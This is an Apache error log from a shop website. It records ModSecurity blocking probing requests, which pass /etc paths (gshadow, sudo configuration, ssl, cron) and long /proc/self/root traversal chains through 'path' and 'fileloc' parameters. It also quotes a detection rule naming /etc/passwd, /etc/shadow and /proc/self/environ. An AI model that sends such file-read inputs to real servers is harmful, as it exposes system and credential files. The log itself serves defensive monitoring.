[Fri Mar 20 10:11:33.692561 2026] [:error] [pid 7893:tid 140411725141760] [client 57.141.18.109:43078] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1HhRCii7xarUs8iHaDngAAAgI"]
[Fri Mar 20 10:11:36.203969 2026] [:error] [pid 7235:tid 140411624429312] [client 57.141.18.76:43176] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1HiPqxLDW4GITHUkQD7QAAAQ4"]
[Fri Mar 20 10:11:39.324636 2026] [:error] [pid 15826:tid 140411683178240] [client 57.141.18.25:43274] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Hi-oXxyEfFpUF8f-bnwAAAUc"]
[Fri Mar 20 10:11:50.682396 2026] [:error] [pid 31215:tid 140411708356352] [client 57.141.18.120:43646] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1HlgF0L0L-SsrnPo6DegAAAsQ"]
[Fri Mar 20 10:11:51.234181 2026] [:error] [pid 15826:tid 140411649607424] [client 57.141.18.92:43664] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Hl-oXxyEfFpUF8f-brwAAAUs"]
[Fri Mar 20 10:12:11.775163 2026] [:error] [pid 11167:tid 140411616036608] [client 57.141.18.107:44394] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Hq_HIg5MgXLBnicMRZAAAAc8"]
[Fri Mar 20 10:12:27.535197 2026] [:error] [pid 26799:tid 140411624429312] [client 57.141.18.11:45044] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/exports"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Hu9a6ubjKNq_cu4b0dgAAA04"]
[Fri Mar 20 10:12:33.463331 2026] [:error] [pid 11642:tid 140411599251200] [client 57.141.18.39:45142] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Hwbninkcc-iUj5Ap4YgAAA5E"]
[Fri Mar 20 10:12:38.225310 2026] [:error] [pid 21219:tid 140411733534464] [client 57.141.18.72:45330] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1HxvXLqtnMIWvjpaK1MAAAAoE"]
[Fri Mar 20 10:12:38.443896 2026] [:error] [pid 21219:tid 140411624429312] [client 57.141.18.17:45342] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1HxvXLqtnMIWvjpaK1MgAAAo4"]
[Fri Mar 20 10:12:38.900125 2026] [:error] [pid 11642:tid 140411540502272] [client 57.141.18.13:45380] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/virc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Hxrninkcc-iUj5Ap4ZAAAA5g"]
[Fri Mar 20 10:12:54.961109 2026] [:error] [pid 11642:tid 140411658000128] [client 57.141.18.109:45908] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1H1rninkcc-iUj5Ap4bQAAA4o"]
[Fri Mar 20 10:13:00.944476 2026] [:error] [pid 15826:tid 140411632822016] [client 57.141.18.79:46144] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1H3OoXxyEfFpUF8f-b2wAAAU0"]
[Fri Mar 20 10:13:14.243846 2026] [:error] [pid 9818:tid 140411741927168] [client 57.141.18.20:46698] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1H6l1pVZ5mVmJwsFNLVQAAAEA"]
[Fri Mar 20 10:13:29.466780 2026] [:error] [pid 7893:tid 140411641214720] [client 57.141.18.116:47262] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1H-RCii7xarUs8iHaD_wAAAgw"]
[Fri Mar 20 10:13:32.278728 2026] [:error] [pid 31215:tid 140411649607424] [client 57.141.18.94:47360] [client 57.141.18.94] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1H_AF0L0L-SsrnPo6EAQAAAss"]
[Fri Mar 20 10:13:37.095556 2026] [mime_magic:error] [pid 11642:tid 140411725141760] (70014)End of file found: [client 57.141.18.24:47550] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:13:46.061788 2026] [mime_magic:error] [pid 31215:tid 140411599251200] (70014)End of file found: [client 57.141.18.47:48074] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:13:47.013386 2026] [:error] [pid 11642:tid 140411607643904] [client 57.141.18.65:48112] [client 57.141.18.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1IC7ninkcc-iUj5Ap4jwAAA5A"]
[Fri Mar 20 10:13:49.866439 2026] [:error] [pid 31215:tid 140411582465792] [client 57.141.18.84:48250] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1IDQF0L0L-SsrnPo6EIAAAAtM"]
[Fri Mar 20 10:13:55.869778 2026] [mime_magic:error] [pid 26799:tid 140411590858496] (70014)End of file found: [client 57.141.18.98:48724] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:13:58.768158 2026] [:error] [pid 31215:tid 140411632822016] [client 74.7.243.128:46566] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1IFgF0L0L-SsrnPo6EMwAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 10:14:00.195131 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:33618] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1IGNa6ubjKNq_cu4b03wAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:14:01.787536 2026] [:error] [pid 9818:tid 140411649607424] [client 74.7.243.128:33630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1IGV1pVZ5mVmJwsFNLewAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 10:14:03.339286 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.243.128:33636] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1IG_qxLDW4GITHUkQEpgAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:14:07.059645 2026] [:error] [pid 11167:tid 140411733534464] [client 74.7.228.61:43486] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1IHfHIg5MgXLBnicMRvQAAAcE"]
[Fri Mar 20 10:14:07.062471 2026] [:error] [pid 10189:tid 140411607643904] [client 57.141.18.77:49266] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1IHjJ3M9BSuKP7CAY9dwAAAJA"]
[Fri Mar 20 10:14:08.347243 2026] [:error] [pid 11642:tid 140411741927168] [client 57.141.18.79:49366] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1IILninkcc-iUj5Ap4qgAAA4A"]
[Fri Mar 20 10:14:09.231214 2026] [:error] [pid 11167:tid 140411607643904] [client 74.7.243.128:33652] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1IIfHIg5MgXLBnicMRvwAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:14:10.885035 2026] [:error] [pid 11642:tid 140411582465792] [client 74.7.243.128:53172] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1IIrninkcc-iUj5Ap4rgAAA5M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
